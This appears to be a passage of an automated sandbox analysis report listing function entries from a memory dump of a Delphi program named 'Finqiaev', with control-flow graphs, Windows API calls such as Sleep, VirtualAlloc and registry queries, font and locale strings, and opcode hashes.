                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Char$Class$FileIconInfoLoadLongLowerMessageModuleNameNextRegisterSendWindow
                                                                                                                                  • String ID: MAINICON
                                                                                                                                  • API String ID: 2763768735-2283262055
                                                                                                                                  • Opcode ID: 0b0d52fd9efd31a32b20633cb203d192e0bccb7644e29cbcd625471bdbdd4b6d
                                                                                                                                  • Instruction ID: a74f4f4ac10e0960e87dfd002769c09b99532fe97b4063d2f8c4a96f9ef05fe0
                                                                                                                                  • Opcode Fuzzy Hash: 0b0d52fd9efd31a32b20633cb203d192e0bccb7644e29cbcd625471bdbdd4b6d
                                                                                                                                  • Instruction Fuzzy Hash: 22516E746042449FEB40EF68C8C4BC53BE4AB5530CF4481F9DC88DF396D7BAA9888B65
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 5077 40b17c3-40b17d2 5078 40b17d8-40b17e8 5077->5078 5079 40b1a04-40b1a09 5077->5079 5082 40b17ea-40b17f7 5078->5082 5083 40b1840-40b1849 5078->5083 5080 40b1a0f-40b1a20 5079->5080 5081 40b1b1c-40b1b1f 5079->5081 5084 40b1a22-40b1a3e 5080->5084 5085 40b19d4-40b19e1 5080->5085 5087 40b1720-40b1749 VirtualAlloc 5081->5087 5088 40b1b25-40b1b27 5081->5088 5089 40b17f9-40b1806 5082->5089 5090 40b1810-40b181c 5082->5090 5083->5082 5086 40b184b-40b1857 5083->5086 5091 40b1a4c-40b1a5b 5084->5091 5092 40b1a40-40b1a48 5084->5092 5085->5084 5096 40b19e3-40b19f7 Sleep 5085->5096 5086->5082 5093 40b1859-40b1865 5086->5093 5094 40b177b-40b1781 5087->5094 5095 40b174b-40b1778 call 40b16e0 5087->5095 5097 40b1808-40b180c 5089->5097 5098 40b1830-40b183d 5089->5098 5099 40b181e-40b182c 5090->5099 5100 40b188c-40b1895 5090->5100 5102 40b1a5d-40b1a71 5091->5102 5103 40b1a74-40b1a7c 5091->5103 5101 40b1aa8-40b1abe 5092->5101 5093->5082 5104 40b1867-40b187a Sleep 5093->5104 5095->5094 5096->5084 5108 40b19f9-40b1a00 Sleep 5096->5108 5106 40b18c8-40b18d2 5100->5106 5107 40b1897-40b18a4 5100->5107 5114 40b1ac0-40b1ace 5101->5114 5115 40b1ad7-40b1ae3 5101->5115 5102->5101 5110 40b1a98-40b1a9a call 40b1668 5103->5110 5111 40b1a7e-40b1a96 5103->5111 5104->5082 5109 40b1880-40b1887 Sleep 5104->5109 5116 40b1944-40b1950 5106->5116 5117 40b18d4-40b18ff 5106->5117 5107->5106 5113 40b18a6-40b18ba Sleep 5107->5113 5108->5085 5109->5083 5120 40b1a9f-40b1aa7 5110->5120 5111->5120 5113->5106 5122 40b18bc-40b18c3 Sleep 5113->5122 5114->5115 5123 40b1ad0 5114->5123 5126 40b1ae5-40b1af8 5115->5126 5127 40b1b04 5115->5127 5118 40b1978-40b1987 call 40b1668 5116->5118 5119 40b1952-40b1964 5116->5119 5124 40b1918-40b1926 5117->5124 5125 40b1901-40b190f 5117->5125 5138 40b1999-40b19d2 5118->5138 5142 40b1989-40b1993 5118->5142 5129 40b1968-40b1976 5119->5129 5130 40b1966 5119->5130 5122->5107 5123->5115 5133 40b1928-40b1942 call 40b159c 5124->5133 5134 40b1994 5124->5134 5125->5124 5132 40b1911 5125->5132 5128 40b1b09-40b1b1b 5126->5128 5135 40b1afa-40b1aff call 40b159c 5126->5135 5127->5128 5129->5138 5130->5129 5132->5124 5133->5138 5134->5138 5135->5128
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 040B186C
                                                                                                                                  • Sleep.KERNEL32(0000000A,00000000), ref: 040B1882
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                  • Opcode ID: f684149fa0e6b04a13656b4649f5843955386b95d62aed01cc0db59f871ed84e
                                                                                                                                  • Instruction ID: 6efd7dd1566bbdff0cd89df54ed1fefcc5e7288028a6f0b3a2245226c360aa89
                                                                                                                                  • Opcode Fuzzy Hash: f684149fa0e6b04a13656b4649f5843955386b95d62aed01cc0db59f871ed84e
                                                                                                                                  • Instruction Fuzzy Hash: 7DB136766003008BC715CF29E8A43A5BBE1FB85395F5882AED4A5AF3C4D738B881C7D4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 5146 40b1b2b-40b1b37 5147 40b1c08-40b1c0b 5146->5147 5148 40b1b3d-40b1b41 5146->5148 5149 40b1cf8-40b1cfc 5147->5149 5150 40b1c11-40b1c1b 5147->5150 5151 40b1b43-40b1b4a 5148->5151 5152 40b1ba4-40b1bad 5148->5152 5158 40b1d02-40b1d07 5149->5158 5159 40b1784-40b17a7 call 40b16e0 VirtualFree 5149->5159 5154 40b1bd8-40b1be5 5150->5154 5155 40b1c1d-40b1c29 5150->5155 5156 40b1b78-40b1b7a 5151->5156 5157 40b1b4c-40b1b57 5151->5157 5152->5151 5153 40b1baf-40b1bc3 Sleep 5152->5153 5153->5151 5160 40b1bc9-40b1bd4 Sleep 5153->5160 5154->5155 5161 40b1be7-40b1bfb Sleep 5154->5161 5162 40b1c2b-40b1c2e 5155->5162 5163 40b1c60-40b1c6e 5155->5163 5166 40b1b8f 5156->5166 5167 40b1b7c-40b1b8d 5156->5167 5164 40b1b59-40b1b5e 5157->5164 5165 40b1b60-40b1b75 5157->5165 5177 40b17a9-40b17b0 5159->5177 5178 40b17b2 5159->5178 5160->5152 5161->5155 5169 40b1bfd-40b1c04 Sleep 5161->5169 5170 40b1c32-40b1c36 5162->5170 5163->5170 5173 40b1c70-40b1c75 call 40b155c 5163->5173 5171 40b1b92-40b1b9f 5166->5171 5167->5166 5167->5171 5169->5154 5175 40b1c78-40b1c85 5170->5175 5176 40b1c38-40b1c3e 5170->5176 5171->5150 5173->5170 5175->5176 5181 40b1c87-40b1c8e call 40b155c 5175->5181 5182 40b1c90-40b1c9a 5176->5182 5183 40b1c40-40b1c5e call 40b159c 5176->5183 5179 40b17b5-40b17bf 5177->5179 5178->5179 5181->5176 5185 40b1cc8-40b1cf5 call 40b15fc 5182->5185 5186 40b1c9c-40b1cc4 VirtualFree 5182->5186
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 040B1BB3
                                                                                                                                  • Sleep.KERNEL32(0000000A,00000000), ref: 040B1BCD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                  • Opcode ID: 302eb44aeb4b83a34f1bf02b5b9f6656d3d792dafdbf17bda4408af885dbb1b4
                                                                                                                                  • Instruction ID: 23e7c7e061841e3f415a129563c92c030bbc69462290c7a639c4b6e328e1af83
                                                                                                                                  • Opcode Fuzzy Hash: 302eb44aeb4b83a34f1bf02b5b9f6656d3d792dafdbf17bda4408af885dbb1b4
                                                                                                                                  • Instruction Fuzzy Hash: E551F4716103008EE7168F28D9A4BD6BBD0EB45395F2881AED4C4AF381E774E884C7D9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 5192 40d765c-40d7696 MulDiv 5193 40d76ae-40d76e7 call 40d0204 call 40d02a4 call 40d0308 5192->5193 5194 40d7698-40d769f call 40d7618 5192->5194 5205 40d76e9-40d76f4 call 40d0538 5193->5205 5206 40d7701-40d7716 call 40b38d0 5193->5206 5194->5193 5199 40d76a1-40d76a9 call 40b4820 5194->5199 5199->5193 5209 40d76f9-40d76fc call 40d0274 5205->5209 5209->5206
                                                                                                                                  APIs
                                                                                                                                  • MulDiv.KERNEL32(00000008,0414A374,00000048), ref: 040D7682
                                                                                                                                    • Part of subcall function 040D7618: SelectObject.GDI32(00000000,0414A380), ref: 040D7633
                                                                                                                                    • Part of subcall function 040D7618: ReleaseDC.USER32(00000000,00000000), ref: 040D764F
                                                                                                                                  Strings
                                                                                                                                  • MS Shell Dlg 2, xrefs: 040D76EC
                                                                                                                                  • SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 040D76D8
                                                                                                                                  • Tahoma, xrefs: 040D76A4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectReleaseSelect
                                                                                                                                  • String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma
                                                                                                                                  • API String ID: 1831053106-1011973972
                                                                                                                                  • Opcode ID: 0aa38e67d68171a1d3b5dd12af30e81f0cb5949525c4cff0528f2071aec57ae9
                                                                                                                                  • Instruction ID: 3f637ed1767d1b7b2a259c0970337fa4c2e0d46d64ea1ae4b43fa653e84788d3
                                                                                                                                  • Opcode Fuzzy Hash: 0aa38e67d68171a1d3b5dd12af30e81f0cb5949525c4cff0528f2071aec57ae9
                                                                                                                                  • Instruction Fuzzy Hash: D0119E34600308AFEB41EFA8CD41DAD7BF5EB4A60CFA148A4E844B7650DB35BE09CB54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 5212 40cea38-40cea66 GetClassInfoA 5213 40cea68-40cea70 5212->5213 5214 40cea72-40cea74 5212->5214 5213->5214 5215 40cea91-40ceac6 call 40b738c 5213->5215 5216 40cea76-40cea82 UnregisterClassA 5214->5216 5217 40cea87-40cea8c RegisterClassA 5214->5217 5220 40ceadc-40ceae2 5215->5220 5221 40ceac8-40ceace call 40ce97c 5215->5221 5216->5217 5217->5215 5223 40cead3-40cead7 SetWindowLongA 5221->5223 5223->5220
                                                                                                                                  APIs
                                                                                                                                  • GetClassInfoA.USER32(041497F8,0411AB1C,?), ref: 040CEA59
                                                                                                                                  • UnregisterClassA.USER32(0411AB1C,041497F8), ref: 040CEA82
                                                                                                                                  • RegisterClassA.USER32(0411AAF8), ref: 040CEA8C
                                                                                                                                  • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 040CEAD7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4025006896-0
                                                                                                                                  • Opcode ID: 7ad92c2972097bec342ffed490c2d13b86604c6c9aff0be5fd64be96a23b713a
                                                                                                                                  • Instruction ID: f92fab2d85c694a94e1a1bca2b7d3a1142c91baba5127d36c074fe34ca78ec1f
                                                                                                                                  • Opcode Fuzzy Hash: 7ad92c2972097bec342ffed490c2d13b86604c6c9aff0be5fd64be96a23b713a
                                                                                                                                  • Instruction Fuzzy Hash: 9C015E71700101ABEA40EBA9DC80EDE37A9EB49308F104114F954F72D1D639BD8087E9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,040D04A2), ref: 040D0374
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,040D04A2), ref: 040D03DF
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 040D0444
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Open
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                  • Opcode ID: 36bfc9563f4e921bbb51083220b0f322cb4ec72a4d99854e45a3c95292d810e1
                                                                                                                                  • Instruction ID: fb2fddb8070c846ec2eb0cdb532259629bc22cdd5a563cdad19bb65571a9fe0d
                                                                                                                                  • Opcode Fuzzy Hash: 36bfc9563f4e921bbb51083220b0f322cb4ec72a4d99854e45a3c95292d810e1
                                                                                                                                  • Instruction Fuzzy Hash: 99416570B40308AFEB11EBA4C951FDEB7F9AF4470CF104469A848B7252D7B5AF099B85
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 5342 40cf2a8-40cf2f2 call 40b5248 5345 40cf30b-40cf30d 5342->5345 5346 40cf2f4-40cf306 call 40bc148 call 40b412c 5342->5346 5348 40cf4d4-40cf4fb 5345->5348 5349 40cf313-40cf327 5345->5349 5346->5345 5351 40cf4fd-40cf50c 5348->5351 5352 40cf525-40cf528 5348->5352 5353 40cf329-40cf343 5349->5353 5355 40cf50e 5351->5355 5356 40cf513-40cf523 5351->5356 5357 40cf539-40cf555 5352->5357 5358 40cf52a-40cf52c 5352->5358 5359 40cf35d-40cf361 5353->5359 5360 40cf345-40cf358 5353->5360 5355->5356 5356->5357 5370 40cf55a-40cf55c 5357->5370 5358->5357 5361 40cf52e-40cf532 5358->5361 5363 40cf3d7-40cf3d9 5359->5363 5364 40cf363-40cf372 5359->5364 5362 40cf4cb-40cf4ce 5360->5362 5361->5357 5367 40cf534 5361->5367 5362->5348 5362->5353 5365 40cf3db-40cf3df 5363->5365 5366 40cf420-40cf424 5363->5366 5368 40cf3a4-40cf3cc call 40b56b8 5364->5368 5369 40cf374-40cf3a2 call 40b56b8 5364->5369 5371 40cf3e1-40cf3eb 5365->5371 5372 40cf403-40cf41b 5365->5372 5373 40cf499-40cf4b0 5366->5373 5374 40cf426-40cf42e 5366->5374 5367->5357 5390 40cf3cf-40cf3d2 5368->5390 5369->5390 5376 40cf55e-40cf561 call 40cf880 5370->5376 5377 40cf566-40cf56b 5370->5377 5371->5372 5382 40cf3ed-40cf3fe call 40bfe44 5371->5382 5383 40cf4c7 5372->5383 5373->5383 5387 40cf4b2-40cf4b6 5373->5387 5384 40cf46e-40cf497 5374->5384 5385 40cf430-40cf46c call 40b56b8 5374->5385 5376->5377 5380 40cf56d-40cf57a 5377->5380 5381 40cf589-40cf59b 5377->5381 5391 40cf57c-40cf580 call 40b5694 5380->5391 5392 40cf585-40cf587 5380->5392 5393 40cf59d-40cf5ad SysFreeString 5381->5393 5394 40cf5af 5381->5394 5382->5372 5383->5362 5384->5383 5385->5383 5387->5383 5389 40cf4b8-40cf4c4 5387->5389 5389->5383 5390->5383 5391->5392 5392->5380 5392->5381 5393->5393 5393->5394
                                                                                                                                  APIs
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 040CF5A6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeString
                                                                                                                                  • String ID: H
                                                                                                                                  • API String ID: 3341692771-2852464175
                                                                                                                                  • Opcode ID: 8f4da43b886c13e1020a43c40f9af8e5e2caf2025a143cf5c56765b02e35dd61
                                                                                                                                  • Instruction ID: 6f134420629ab51672cafa0f950170d3e09f3aee800e2e82b0e3c37323afba2b
                                                                                                                                  • Opcode Fuzzy Hash: 8f4da43b886c13e1020a43c40f9af8e5e2caf2025a143cf5c56765b02e35dd61
                                                                                                                                  • Instruction Fuzzy Hash: DCB1F574A01609EFDB50CFA8D880A9DBBF2FF89314F248169E905AB3A0D730AC45CF55
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,040D0524), ref: 040D04F2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue
                                                                                                                                  • String ID: MS Shell Dlg 2
                                                                                                                                  • API String ID: 3660427363-3198668166
                                                                                                                                  • Opcode ID: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
                                                                                                                                  • Instruction ID: 23c6488a3df2776ea6407875b4712c703af763ece4616d18605390f843757248
                                                                                                                                  • Opcode Fuzzy Hash: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
                                                                                                                                  • Instruction Fuzzy Hash: A1F030763092086BE704EAAD9D40FEB7BDCDB89658F01853AB94CD7241DA21ED0983B5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a8707da026dcfc9045cf0ea18ee677af009f35ed02cce36516ff8712054d3577
                                                                                                                                  • Instruction ID: 8bcc54a5fcf72d21c2568d07f0f76d7ef871bbe3b0f361c79f16b4ba99eb1bab
                                                                                                                                  • Opcode Fuzzy Hash: a8707da026dcfc9045cf0ea18ee677af009f35ed02cce36516ff8712054d3577
                                                                                                                                  • Instruction Fuzzy Hash: 3541B1B98012048FEF64DF79D0847D63BE0FB46369F144159D894AB282C778AED1CF99
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClearVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                  • Opcode ID: 1e5d98aae3d8d43aa0c7820116f54dfd8caed5e229c3ed6d7fbe6c34bafc0db7
                                                                                                                                  • Instruction ID: f16b98c44c37cd92e714251bbf2a0cfd015ab9b535cb311e1e8e60fbaf6c8e89
                                                                                                                                  • Opcode Fuzzy Hash: 1e5d98aae3d8d43aa0c7820116f54dfd8caed5e229c3ed6d7fbe6c34bafc0db7
                                                                                                                                  • Instruction Fuzzy Hash: D7F0AF7834020286AB116B38CC84DE923D89F4164CB5048A5E8C6FB351DB29BC0AD2EF
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1927566239-0
                                                                                                                                  • Opcode ID: 3f1e6f221de558faeb8de9162c877786d6f502a6c103b04044eae493afdca4e3
                                                                                                                                  • Instruction ID: 9cf30b27f705aaa8d821106a8b880d438eec3a123bd563d2817049e58020df67
                                                                                                                                  • Opcode Fuzzy Hash: 3f1e6f221de558faeb8de9162c877786d6f502a6c103b04044eae493afdca4e3
                                                                                                                                  • Instruction Fuzzy Hash: F731427560010AABEB50DFA8CC84EEE77E8EB49308F4445A6FD85E3250D634F951CBD9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • VariantCopy.OLEAUT32(00000000,00000000), ref: 040BFAED
                                                                                                                                    • Part of subcall function 040BF6D0: VariantClear.OLEAUT32(?), ref: 040BF6DF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearCopy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 274517740-0
                                                                                                                                  • Opcode ID: 37ac465d116c4e807ce44c4bb44da02dca8a54c9d0c5f9d4aaa41b47a99f8c8d
                                                                                                                                  • Instruction ID: 7833dab7c82ff67fac37a1a0b62c94f2cd683789e1802f1fab12f54aca81be83
                                                                                                                                  • Opcode Fuzzy Hash: 37ac465d116c4e807ce44c4bb44da02dca8a54c9d0c5f9d4aaa41b47a99f8c8d
                                                                                                                                  • Instruction Fuzzy Hash: F011A370700212869720AF28CC90DDB73D9EFC56587148425E8CAFB715DA34EC40D7DA
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 040B73CB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                  • Opcode ID: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
                                                                                                                                  • Instruction ID: 7653487c0296b048cc4412507e1bd2c8b3964cb43da8d3d8bb49b02680226ba6
                                                                                                                                  • Opcode Fuzzy Hash: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
                                                                                                                                  • Instruction Fuzzy Hash: 9FF092B2700119BF9B80DE9DDC84EDB77ECEB4C268B054169FA0CE3200D630ED109BA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 040B73CB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                  • Opcode ID: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
                                                                                                                                  • Instruction ID: 4f74c5877243d30483ecb213e4f90ca86b71f9b137c1b997b773be35d2b8f21f
                                                                                                                                  • Opcode Fuzzy Hash: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
                                                                                                                                  • Instruction Fuzzy Hash: C9F092B2600119BF9B80DE9DDC84EDB77ECEB4C268B054169FA0CE3200D630ED109BA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetVersion.KERNEL32(00000000,0411967E), ref: 04119612
                                                                                                                                    • Part of subcall function 040F7420: GetCurrentProcessId.KERNEL32(?,00000000,040F7598), ref: 040F7441
                                                                                                                                    • Part of subcall function 040F7420: GetCurrentThreadId.KERNEL32 ref: 040F748F
                                                                                                                                    • Part of subcall function 040F7420: GlobalAddAtomA.KERNEL32(00000000), ref: 040F74C5
                                                                                                                                    • Part of subcall function 040F7420: RegisterClipboardFormatA.USER32(00000000), ref: 040F74DB
                                                                                                                                    • Part of subcall function 040F7420: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,040F7598), ref: 040F755F
                                                                                                                                    • Part of subcall function 040F7420: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 040F7570
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$AddressAtomClipboardFormatGlobalHandleModuleProcProcessRegisterThreadVersion
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2893432522-0
                                                                                                                                  • Opcode ID: 542f8c97f433e11aa1ee4885e41a1e3bd5ff6e6342743f3c0ab55b21f50d10c9
                                                                                                                                  • Instruction ID: 72cb38d6466e3ffb13ac72a67327584482b7b05859bbcfaa9feb5e34eac223de
                                                                                                                                  • Opcode Fuzzy Hash: 542f8c97f433e11aa1ee4885e41a1e3bd5ff6e6342743f3c0ab55b21f50d10c9
                                                                                                                                  • Instruction Fuzzy Hash: 05F06278215701EFE315EF6AED5185937E4EBCAB0C3414834E800AB724DABCBCA1DE55
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameA.KERNEL32(02A81B20,?,00000105), ref: 040B5B96
                                                                                                                                    • Part of subcall function 040B5DDC: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 040B5DF8
                                                                                                                                    • Part of subcall function 040B5DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 040B5E16
                                                                                                                                    • Part of subcall function 040B5DDC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 040B5E34
                                                                                                                                    • Part of subcall function 040B5DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 040B5E52
                                                                                                                                    • Part of subcall function 040B5DDC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,040B5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 040B5E9B
